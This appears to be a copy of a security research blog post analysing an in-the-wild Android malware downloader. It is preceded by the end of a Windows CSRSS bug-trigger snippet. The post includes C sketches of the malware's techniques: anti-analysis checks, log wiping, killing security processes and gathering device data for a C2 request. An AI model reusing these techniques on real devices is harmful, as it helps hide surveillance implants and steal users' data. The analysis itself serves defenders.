  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);
  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);
  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);
  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.
  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);
}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.


In-the-Wild Series: Android Post-Exploitation

Published: 2021-01-12 17:37:00

Popularity: 16

Author: Ryan


This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. For this post, I will refer to different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3, is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead, it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that performs the heavy lifting of the binary’s behavior. The init function simply calls pthread_join on the thread spawned by the second .init_array function, so it waits for that thread to terminate.
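
To make that flow concrete, here is a minimal sketch of the same structure: two .init_array constructors, the second of which spawns the worker thread, and an exported init that merely joins it. The function names and environment values are illustrative assumptions; the post only states which variables are checked.

/* Minimal sketch of the described structure, using GCC/Clang constructor
   attributes to populate .init_array. Names and values are illustrative. */
#include <pthread.h>
#include <stdlib.h>

static pthread_t g_worker;

static void *worker_main(void *arg) {
  /* ... decryption, anti-analysis checks, C2 communication ... */
  return NULL;
}

/* First .init_array entry: normalize the environment. */
__attribute__((constructor(101)))
static void fix_environment(void) {
  setenv("PATH", "/sbin:/system/sbin:/system/bin:/system/xbin", 1); /* assumed */
  setenv("ANDROID_DATA", "/data", 1);                               /* assumed */
  setenv("ANDROID_ROOT", "/system", 1);                             /* assumed */
}

/* Second .init_array entry: spawn the worker thread. */
__attribute__((constructor(102)))
static void spawn_worker(void) {
  pthread_create(&g_worker, NULL, worker_main, NULL);
}

/* Exported entry point called by stage 2: just wait for the worker. */
void init(void) {
  pthread_join(g_worker, NULL);
}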

In the newly spawned thread, the code first cleans up from the previous stage by deleting most of the environment variables that stage 2 set. It then kills any processes that include the word “knox” in their cmdline. Knox is a security platform that is built into Samsung devices.
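
A process sweep like this can be implemented by scanning /proc and reading each process’s cmdline, as in the sketch below; this mirrors the described behavior rather than the binary’s decompiled code, and for brevity it only matches against the first NUL-terminated argument.

#include <ctype.h>
#include <dirent.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Kill any process whose cmdline contains the given substring,
   e.g. kill_matching("knox"). */
static void kill_matching(const char *needle) {
  DIR *proc = opendir("/proc");
  struct dirent *ent;
  if (!proc) return;
  while ((ent = readdir(proc)) != NULL) {
    if (!isdigit((unsigned char)ent->d_name[0])) continue;  /* PIDs only */
    char path[64], cmdline[256] = {0};
    snprintf(path, sizeof(path), "/proc/%s/cmdline", ent->d_name);
    FILE *f = fopen(path, "r");
    if (!f) continue;
    (void)fread(cmdline, 1, sizeof(cmdline) - 1, f);
    fclose(f);
    if (strstr(cmdline, needle))
      kill(atoi(ent->d_name), SIGKILL);
  }
  closedir(proc);
}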

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and point them at /dev/null. This prevents output messages from appearing that might lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks. It will also close any file descriptors with a number greater than 32 that include “socket:” in the link, and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.
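
The descriptor sanitization described above could look roughly like the sketch below, which redirects fds 0-2 to /dev/null and then filters the rest by their /proc/self/fd symlink targets. The filtering rules here are a simplification of the prose description, not the binary’s exact logic.

#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static void sanitize_fds(void) {
  int devnull = open("/dev/null", O_RDWR);
  for (int fd = 0; fd <= 2; fd++)
    dup2(devnull, fd);                 /* silence stdin/stdout/stderr */

  DIR *d = opendir("/proc/self/fd");
  struct dirent *ent;
  if (!d) return;
  while ((ent = readdir(d)) != NULL) {
    int fd = atoi(ent->d_name);
    if (fd <= 2 || fd == devnull || fd == dirfd(d)) continue;
    char path[64], target[256] = {0};
    snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
    if (readlink(path, target, sizeof(target) - 1) < 0) continue;
    /* Simplified version of the described filters. */
    if (strstr(target, "pipe:") || strstr(target, "anon_inode:") ||
        (fd > 32 && strstr(target, "socket:")))
      close(fd);
  }
  closedir(d);
}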

The thread will then call into the function that implements the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and execute it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, organized by category.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a string obfuscation technique similar to stage 2’s. The binary also obfuscates its behavior by using a hash table to store dynamic configuration settings and status: instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function. The binary encrypts its static configuration settings, its communications with the C2, and the hash table that stores dynamic configuration settings with AES, while the state.parcel file that is saved on the device is XOR encoded. The binary further includes multiple techniques to make dynamic analysis harder: for example, it monitors what is mapped into the process’s memory, monitors what file descriptors it has opened, and sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages: the obfuscated string is passed to a deobfuscation function prior to use, and obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script based on flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.
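
For reference, in-place AES-256 decryption through OpenSSL’s EVP interface looks roughly like the sketch below. The CBC mode and the key/IV parameters here are placeholder assumptions; the post only establishes that AES256 is used with a key and IV hardcoded in the binary.

#include <openssl/evp.h>

/* Decrypt `data` of `len` bytes in place; returns the plaintext length,
   or 0 on failure. Mode (CBC) and key/IV handling are assumptions. */
static int decrypt_block(unsigned char *data, int len,
                         const unsigned char key[32],
                         const unsigned char iv[16]) {
  EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
  int out_len = 0, final_len = 0, ok = 0;
  if (!ctx) return 0;
  if (EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv) &&
      EVP_DecryptUpdate(ctx, data, &out_len, data, len) &&
      EVP_DecryptFinal_ex(ctx, data + out_len, &final_len))
    ok = 1;
  EVP_CIPHER_CTX_free(ctx);
  return ok ? out_len + final_len : 0;
}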

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%
00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-
00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#
00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.
00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....
00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\
00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.
00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.
00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w
00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....
000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A
000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu
000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#
000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....
000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........
000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.
00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]
00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  ...o....e....@.a
00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..
00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as status and configuration. The code initializes a CRC table, which is used in the hashing algorithm, and then the hash table is initialized. The structure that manages the hashtable is shown below:

struct hashtable_mgr {

    int * hashtable_ptr;

    int maxEntries;

    int numEntries;

}

The first member of this struct points to the hash table, which is allocated on the heap and is 0x1400 bytes when first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions used to interact with this hashtable throughout the binary; we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: a pointer to the hashtable manager, a pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Throughout the rest of this post, I will refer to values stored in the hash table by the key’s offset. For example, “the value for offset 0x20 in the hash table” means the value stored under the 0x10-byte key that begins at the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {

    BYTE * key_ptr;

    uint key_len;

    uint in_use;

    BYTE * value_ptr;

    uint value_len;

};
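Putting the two structures together, a lookup might look like the sketch below. The hash function here is an assumption: the post establishes only that a CRC table feeds the hashing algorithm, so a CRC32 of the 0x10-byte key reduced modulo the entry count stands in for it, and the linear probing is likewise assumed.

#include <stdint.h>
#include <string.h>
#include <zlib.h>   /* crc32(); the real binary builds its own CRC table */

struct hashtable_entry {
    uint8_t *key_ptr;
    uint32_t key_len;
    uint32_t in_use;
    uint8_t *value_ptr;
    uint32_t value_len;
};

struct hashtable_mgr {
    struct hashtable_entry *hashtable_ptr;
    int maxEntries;
    int numEntries;
};

/* Sketch of getValueFromHashtable: hash the 0x10-byte key, then probe
 * for the matching in-use entry. */
static int getValueFromHashtable(struct hashtable_mgr *mgr,
                                 const uint8_t key[16],
                                 uint8_t **value, uint32_t *value_len) {
    uint32_t slot = crc32(0, key, 16) % mgr->maxEntries;  /* assumed hash */
    for (int i = 0; i < mgr->maxEntries; i++) {
        struct hashtable_entry *e =
            &mgr->hashtable_ptr[(slot + i) % mgr->maxEntries];
        if (!e->in_use)
            return -1;  /* empty slot: key is not present */
        if (e->key_len == 16 && memcmp(e->key_ptr, key, 16) == 0) {
            *value = e->value_ptr;
            *value_len = e->value_len;
            return 0;
        }
    }
    return -1;
}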

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of, for example the filename where stage 4 should be saved and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators of its presence as possible. However, stage 3 does save a couple of files and add environment variables in order to function, in addition to the stage 4 code discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section is deleted as soon as it’s no longer needed, but each will be on a device for at least some period of time. For each file saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time-consuming for an analyst to detect the presence of the file on a device, because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code records the current time at the beginning of a file named state.parcel. It then checks how many times per day this has been done by reading all of the times currently in the file. If there are fewer than 6 entries for the current day, the code proceeds. If there are 6 entries from the current day and at least 5 entries for each of the previous 3 days, the binary sets a variable that tells the code to clean up and exit. If there are 6 entries for the current day and at least one entry for each of the past 3 days, the binary cleans up the persistent files for both this and other stages and then does a max sleep: sleep(0xFFFFFFFF), the equivalent of sleeping for over 136 years.
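A simplified sketch of that gating logic follows; count_entries_for_day and cleanup_persistent_files are hypothetical helper names standing in for the file parsing and cleanup routines.

#include <unistd.h>

/* Hypothetical helpers for parsing state.parcel and removing artifacts. */
extern int count_entries_for_day(int days_ago);  /* 0 = today */
extern void cleanup_persistent_files(void);

/* Sketch of the state.parcel run-frequency gate described above. */
static int state_parcel_gate(void) {
    if (count_entries_for_day(0) < 6)
        return 1;  /* fewer than 6 runs today: proceed */
    int five_each_day = 1, one_each_day = 1;
    for (int d = 1; d <= 3; d++) {
        if (count_entries_for_day(d) < 5) five_each_day = 0;
        if (count_entries_for_day(d) < 1) one_each_day = 0;
    }
    if (five_each_day)
        return 0;  /* set the clean-up-and-exit flag */
    if (one_each_day) {
        cleanup_persistent_files();
        sleep(0xFFFFFFFF);  /* "max sleep": over 136 years */
    }
    return 0;
}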

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, the state.parcel file is written to whatever directory the binary is executing out of according to /proc/self/exe. The contents of state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.
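A minimal sketch of the encoding, assuming each recorded entry is a 32-bit value (the entry width is not stated above):

#include <stdint.h>

/* state.parcel entries are XOR'ed with 0xFF12EE34; XOR is its own
 * inverse, so the same routine encodes and decodes. */
static uint32_t parcel_xor(uint32_t entry) {
    return entry ^ 0xFF12EE34;
}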

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and status information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file to.

Whenever the hashtable is written to uierrors.txt, it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but the binary generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first, followed by the encrypted hash table contents; the CRC32 of the encrypted contents is written as the last 4 bytes of the file.
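A sketch of the resulting on-disk layout is shown below. The aes256_encrypt helper is hypothetical (standing in for the same OpenSSL routine used on the configuration block), while RAND_bytes and zlib's crc32 are real library calls:

#include <stdint.h>
#include <stdio.h>
#include <openssl/rand.h>
#include <zlib.h>

/* Hypothetical helper: AES-256 encryption with the shared config key. */
extern int aes256_encrypt(const unsigned char *in, int inlen,
                          const unsigned char iv[16], unsigned char *out);

/* Sketch of uierrors.txt: random IV, then ciphertext, then the CRC32
 * of the encrypted contents as the trailing 4 bytes. */
static int write_uierrors(FILE *f, const unsigned char *table, int len) {
    unsigned char iv[16], enc[4096];
    if (RAND_bytes(iv, sizeof(iv)) != 1)
        return -1;
    int enclen = aes256_encrypt(table, len, iv, enc);
    if (enclen < 0)
        return -1;
    uint32_t crc = crc32(0, enc, enclen);
    fwrite(iv, 1, sizeof(iv), f);   /* IV comes first */
    fwrite(enc, 1, enclen, f);      /* encrypted hash table */
    fwrite(&crc, 1, 4, f);          /* CRC32 of the encrypted contents */
    return 0;
}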

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

The environment variables it sets are listed below:

  • abc: Address of the decrypted data block
  • def: Address of the function that sends logging messages to the C2 server
  • def2: Address of the function that adds logging messages to the error and/or informational logging message queues
  • ghi: Pointer to the decrypted block of hashtable keys
  • ddd: Address of the function that performs inflate (decompress)
  • ccc: Address of the function that performs deflate (compress)
  • 0x10 bytes at 0x228CC: ???
  • 0x10 bytes at 0x228DC: Pointer to the string representation of the hex_d_uuid
  • 0x10 bytes at 0x228F0: Pointer to the C2 domain URL
  • 0x10 bytes at 0x22904: Pointer to the port string for the C2 server
  • 0x10 bytes at 0x22918: Pointer to the beginning of the certificate
  • 0x10 bytes at 0x2292C: 0x1000
  • 0x10 bytes at 0x22940: Pointer to +4AA in the decrypted data block
  • 0x10 bytes at 0x22954: 0x14
  • 0x10 bytes at 0x22698: Pointer to the user-agent string
  • PPR: SELinux status such as “selinux-init-read-fail” or “selinux-no-mdm”
  • PPMM: Set if there is no “persist.security.mdm.policy” string in /init
  • PPQQ: Set if the “persist.security.mdm.policy” string is in /init

Error Handling & Logging

The binary has a very detailed and mature logging mechanism that tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server, either when stage 3 automatically reaches out to the C2 server or “on-demand” by calling the subroutine saved as environment variable “def”. The subroutine saved as environment variable “def2” adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent about cleaning up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process that is responsible for cleaning up logs while the rest of the code executes. This process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0) which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
      • /data/tombstones
      • /data/misc/audit
      • /data/system/dropbox
      • /data/anr
      • /data/log
  • Unlink the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary begins preparing the network communications. First the binary performs a DNS test, then gathers device information and sends the POST request to the C2 server. If all of these steps are successful, it receives the next stage back and prepares to execute it.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. The test function takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters and calls getaddrinfo on it. It’s looking for a hostname that causes getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host; it will attempt 3 different hostnames before bailing if none of them returns EAI_NODATA. Some disconnected analysis sandboxes respond to all hostnames, so the code is trying to detect this type of malware analysis environment.
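A sketch of the check is below. The random generator and loop bounds follow the description above; note that EAI_NODATA is a GNU/bionic extension result code, hence the _GNU_SOURCE define.

#define _GNU_SOURCE   /* for EAI_NODATA on glibc */
#include <netdb.h>
#include <stddef.h>
#include <stdlib.h>

/* Sketch: a randomly generated hostname should NOT resolve on a real
 * network; sandboxes that resolve everything fail this check. */
static int dns_sanity_check(void) {
    for (int attempt = 0; attempt < 3; attempt++) {
        char host[17];
        int len = 8 + rand() % 9;         /* 8-16 characters */
        for (int i = 0; i < len; i++)
            host[i] = 'a' + rand() % 26;  /* lowercase latin */
        host[len] = '\0';
        struct addrinfo *res = NULL;
        int rc = getaddrinfo(host, NULL, NULL, &res);
        if (res)
            freeaddrinfo(res);
        if (rc == EAI_NODATA)
            return 0;  /* resolver behaves normally: proceed */
    }
    return -1;  /* every bogus name resolved: likely an analysis sandbox */
}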

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted data block (passed as argument 1) at offset 0x14C7; in this binary it is 8.8.8.8:53, the Google DNS server. The code connects to the DNS server via a socket, sends a Type A query for the randomly generated hostname, and parses the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”. If the code receives NXDomain back, it will proceed with the code path that communicates with the C2 server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary begins collecting all the device information that it would like to send. The code collects A LOT of data to be sent to the C2 server. Six different sets of information are collected, formatted, compressed, and encrypted prior to being sent to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties, which it does in two different ways:

  • Calling __system_property_get, obtained by doing dlopen(/system/lib/libc.so) and dlsym('__system_property_get'), as sketched below
  • Executing getprop in popen
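A sketch of the first method follows; the property name in the usage comment is just an example.

#include <dlfcn.h>

/* Sketch: resolve __system_property_get at runtime instead of linking
 * against it. `value` should hold PROP_VALUE_MAX (92) bytes; the
 * function fills it and returns the value's length. */
typedef int (*sys_prop_get_t)(const char *name, char *value);

static int read_property(const char *name, char *value) {
    void *libc = dlopen("/system/lib/libc.so", RTLD_NOW);
    if (!libc)
        return -1;
    sys_prop_get_t prop_get =
        (sys_prop_get_t)dlsym(libc, "__system_property_get");
    int len = prop_get ? prop_get(name, value) : -1;
    dlclose(libc);
    return len;
}

/* Example: read_property("ro.build.version.sdk", buf); */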

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the function’s transaction code: essentially, the position at which the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each Android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK versions 8-20, 5 for SDK version 21, and 7 for SDK versions 22-29.
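A sketch of that version-dependent dispatch, using the getSubscriberId codes cited above (the helper name and command formatting are illustrative, not taken from the binary):

#include <stdio.h>

/* Sketch: pick the hardcoded iphonesubinfo transaction code for
 * getSubscriberId based on the SDK version, then run "service call". */
static FILE *query_subscriber_id(int sdk) {
    int code;
    if (sdk >= 8 && sdk <= 20)
        code = 3;
    else if (sdk == 21)
        code = 5;
    else if (sdk >= 22 && sdk <= 29)
        code = 7;
    else
        return NULL;  /* SDK not covered by the hardcoded table */
    char cmd[64];
    snprintf(cmd, sizeof(cmd), "service call iphonesubinfo %d", code);
    return popen(cmd, "r");  /* caller parses the parcel output */
}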

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid

Logging Information

As described in the Error Handling & Logging section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they document a condition less severe than an error; the distinction is one the developers made in their code.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. Each compressed “message” has the following compressedMessage structure. The messageCode is a type of identification code for the information contained in the message: it’s calculated by taking the CRC32 of the 0x10 bytes at offset 0x1CD8 in the decrypted data block and adding the “identification code”.

struct compressedMessage {

    uint compressedDataLength;

    uint uncompressedDataLength;

    uint messageCode;

    BYTE * dataPointer;

    BYTE[4096] data;

};

Once each of the messages, or sets of data, has been individually compressed into a compressedMessage struct, the byte order is swapped to change the endianness and the data is encrypted using AES256. The key from the decrypted data block is used, and the IV is a set of 0x10 random bytes that is prepended to the beginning of the encrypted message.
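The messageCode computation can be expressed as a one-line sketch using zlib's crc32 (the helper name is illustrative):

#include <stdint.h>
#include <zlib.h>

/* messageCode = CRC32 of the 0x10 bytes at offset 0x1CD8 in the
 * decrypted data block, plus the per-message identification code. */
static uint32_t make_message_code(const uint8_t *decrypted_block,
                                  uint32_t id_code) {
    return (uint32_t)crc32(0, decrypted_block + 0x1CD8, 0x10) + id_code;
}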

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive

Content-Type:application/octet-stream

Content-Length:%u

Cookie: %s

The “Cookie” field holds two name/value pairs, sid and uid, whose values are base64-encoded data taken from the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is then parsed. If the HTTP response code is not 200, it’s considered an error. The received data is first decrypted using AES256; the key is included in the decrypted data block at offset 0x48A, and the IV is the first 0x10 bytes of the response. After decryption, the byte order is swapped using bswap32 and the data is decompressed using inflate. The inflated response body is an executable file or a series of commands.
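A sketch of that pipeline follows. The aes256_decrypt helper is hypothetical (mirroring the OpenSSL routine shown earlier), while __builtin_bswap32 (a GCC/Clang builtin) and zlib's uncompress are real calls, the latter assuming zlib-wrapped input:

#include <stdint.h>
#include <string.h>
#include <zlib.h>

/* Hypothetical helper: AES-256 decryption with the key at offset 0x48A. */
extern int aes256_decrypt(const unsigned char *in, int inlen,
                          const unsigned char iv[16], unsigned char *out);

/* Sketch: strip the IV, decrypt, byte-swap each 32-bit word, inflate. */
static long parse_response(unsigned char *resp, int resplen,
                           unsigned char *out, unsigned long outcap) {
    if (resplen <= 16)
        return -1;
    unsigned char *body = resp + 16;  /* first 0x10 bytes are the IV */
    int len = aes256_decrypt(body, resplen - 16, resp, body);
    if (len < 0)
        return -1;
    for (int i = 0; i + 4 <= len; i += 4) {  /* bswap32 each word */
        uint32_t v;
        memcpy(&v, body + i, sizeof(v));
        v = __builtin_bswap32(v);
        memcpy(body + i, &v, sizeof(v));
    }
    uLongf outlen = outcap;
    if (uncompress(out, &outlen, body, len) != Z_OK)
        return -1;
    return (long)outlen;  /* inflated body: ELF file or commands */
}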

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary deletes the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value pair is hardcoded in the decrypted data block within the binary. The binary then re-adds that same cookie, but with an updated last-accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and, if it isn’t, to collect detailed device data and send it to the C2 server in order to receive back the next stage of code and the commands to execute. The detailed information sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system, a shared library ELF file executed by calling dlopen and dlsym, and more. This section details the different ways the C2 server can instruct stage 3 to save and begin executing the next stage of code.

